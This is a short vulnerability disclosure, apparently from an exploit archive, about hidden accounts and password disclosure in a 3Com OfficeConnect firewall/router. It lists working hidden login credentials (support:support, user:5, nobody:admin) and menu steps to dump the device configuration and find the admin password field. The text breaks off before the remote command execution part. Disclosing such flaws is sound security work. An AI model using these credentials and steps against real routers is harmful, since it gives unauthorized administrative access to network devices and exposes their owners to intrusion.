|
**************************************************************
Product: 3Com OfficeConnect Firewall/Router
Website: http://www.3com.com/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi@gmail.com
Web: http://www.andreafabrizi.it
Vuln: remote command execution and password disclosure
**************************************************************
####### Admin password disclosure #######
1) SSH/Telnet to router using one of these hidden accounts:
support:support
user:5
nobody:admin
2) Type 9
3) Type 1
3) Type 3 to dump the configuration
4) Locate the sysPassword field: